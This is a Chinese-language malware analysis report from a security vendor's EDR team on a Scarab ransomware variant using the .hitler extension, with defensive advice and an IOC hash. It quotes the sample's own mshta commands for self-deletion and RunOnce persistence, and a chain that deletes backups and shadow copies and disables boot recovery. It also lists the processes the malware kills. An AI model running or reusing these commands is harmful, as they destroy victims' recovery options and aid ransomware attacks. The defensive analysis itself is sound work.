Scarab勒索病毒最新變種，希特勒“冠名”

摘要： 一、事件背景 深信服EDR安全團隊跟蹤了Scarab勒索病毒的最新變種，該變種檔案加密字尾為.hitler，有趣的是，希特勒對應的英文就是hitler，算是莫名躺槍了。 通常，Scarab勒索病毒是利用Necurs殭屍網路進行傳播的，Necurs是世界上最大的殭屍網路之一，曾...

一、事件背景

深信服EDR安全團隊跟蹤了Scarab勒索病毒的最新變種，該變種檔案加密字尾為.hitler，有趣的是，希特勒對應的英文就是hitler，算是莫名躺槍了。

通常，Scarab勒索病毒是利用Necurs殭屍網路進行傳播的，Necurs是世界上最大的殭屍網路之一，曾用於傳播多個惡意家族樣本。最近一段時間，發現Scarab勒索病毒還會通過RDP爆破+人工、捆綁軟體的方式進行傳播。

下圖，是此變種的勒索資訊。

二、功能流程

此Scarab變種，其功能流程大致如下，依次分別為偽裝錄屏、螢幕快照、記憶體解密、設定啟動、自刪除、刪除卷影、殺程序、遍歷加密、勒索彈窗。

偽裝錄屏，是為了騙過安全軟體，讓其誤以為是一個正常的錄屏軟體。此外，還截圖了螢幕快照。與多數病毒一樣，此勒索變種同樣會設定啟動，做持久化操作，也會做自刪除的動作。為了保證資料不可恢復，同時也做了刪除卷影的操作。

此外，此勒索病毒會殺掉多數的系統程序、應用程序、殺掉程序，最後遍歷資料夾，做加密。所有的檔案加密成功後，彈出勒索資訊。

三、詳細分析

1.查殼，母體樣本使用的是UPX加殼，如下所示：

2.樣本使用了詳細的檔案描述資訊，如下所示：

3.脫殼分析，動態除錯，如下所示：

4.錄製音訊，如下所示：

相應的反彙編程式碼，如下所示：

5.建立視窗，如下所示：

6.獲取作業系統語言版本，如下所示：

7.設定HOOK，如下所示：

8.抓屏操作，如下所示：

9.啟動子程序，如下所示：

10.進行持久化操作，拷貝自身到%appdata%目錄下，如下所示：

拷貝之後，如下所示：

然後啟動%appdata%目錄下的sevnz.exe程式，如下所示：

11.解密記憶體相應的字串，如下所示：

通過執行mshta.exe，刪除自身，如下所示：

相應的命令列，如下：

mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"

12.呼叫mshta.exe程式，設定自啟動項，如下所示：

相應的命令列，如下：

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\iyryCNqPEUF',i);}catch(e){}},10);"

設定完成之後，如下所示：

13.通過mshta.exe設定相應的登錄檔項，如下所示：

將相應的刪除系統備份，磁碟卷影操作的命令列，設定為登錄檔項，如下所示：

通過mshta.exe執行命令，如下所示：

相應的命令列，如下：

o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.ex
e /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);

14.遍歷程序，如下所示：

發現相關的程序，則結束程序，如下所示：

相關程序列表如下：

ccleaner.exe;ccleaner64.exe;tasklist.exe;taskmgr.exe;regedit.exe;anvir.exe;anvir64.exe;cscript.exe;wscript.exe;powershell.exe;procexp.exe;far.exe;agntsvc.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;agntsvc.exeisqlplussvc.exe;dbeng50.exe;dbsnmp.exe;excel.exe;firefoxconfig.exe;infopath.exe;isqlplussvc.exe;msaccess.exe;msftesql.exe;mspub.exe;mydesktopqos.exe;mydesktopservice.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;ncsvc.exe;ocautoupds.exe;ocomm.exe;ocssd.exe;onenote.exe;oracle.exe;outlook.exe;powerpnt.exe;sqbcoreservice.exe;sqlagent.exe;sqlbrowser.exe;sqlserver.exe;sqlservr.exe;sqlwriter.exe;steam.exe;synctime.exe;tbirdconfig.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;xfssvccon.exe;

15.記憶體解密出相應的加密字串，然後設定為登錄檔項，如下所示：

16.在記憶體中解密生成相應的勒索資訊，使用者的加密ID，如下所示：

17.遍歷檔案，記憶體中加密相應的檔案，檔名隨機生成，檔案字尾為hitler如下所示：

18.然後替換到原始的檔案，如下所示：

19.然後設定加密後的檔案屬性，如下所示：

20.遍歷檔案的時候，會判斷是否為加密檔案列表中的字尾，相應的字尾列表有二百多種，如下所示：

部分字尾名列表，如下所示：

21.同時會遍歷相應的檔案目錄，排除以下檔案目錄，相應的檔案目錄列表如下：

\$RECYCLE.BIN\;
\All Users\;
\AppData\;
\ApplicationData\;
\System Volume Information\;
\Windows\;
\intel\;
\nvidia\;
\Trend Micro\;

22.在加密檔案的目錄下，生成對應的勒索資訊文字檔案，然後將之前記憶體生成的勒索資訊，寫入到檔案，如下所示：

23.勒索資訊文字檔案HOW TO RECOVER ENCRYPTED FILES.TXT，最後通過執行notepad.exe程式，彈出相應的勒索資訊，執行的命令列如下：notepad.exe  "C:\Users\panda\HOW TO RECOVER ENCRYPTED FILES.TXT"

四、解決方案

深信服提醒廣大使用者做好病毒檢測與防禦措施，防護勒索病毒攻擊。

1、及時給電腦打補丁，修復漏洞。

2、對重要的資料檔案定期進行非本地備份。

3、不要點選來源不明的郵件附件，不從不明網站下載軟體。

4、儘量關閉不必要的檔案共享許可權。

5、更改帳號密碼，設定強密碼，避免使用統一的密碼，因為統一的密碼會導致一臺被攻破，多臺遭殃。

6、Scarab勒索病毒最新變種會利用RDP（遠端桌面協議），如果業務上無需使用RDP的，建議關閉RDP。當出現此類事件時，推薦使用深信服防火牆，或者終端檢測響應平臺（EDR）的微隔離功能對3389等埠進行封堵，防止擴散！

7、深信服防火牆、終端檢測響應平臺（EDR）均有防爆破功能，防火牆開啟此功能並啟用11080051、11080027、11080016規則，EDR開啟防爆破功能進行防禦。

8、深信服安全感知平臺（SIP）可對企業內網進行全網的安全態勢感知，支援接入EDR、防火牆等眾多安全產品，對安全可視，可協助使用者提前預警安全威脅。

五、IOC/">IOC

MD5

374F8ACCC92838939A6D3960AAB36AA0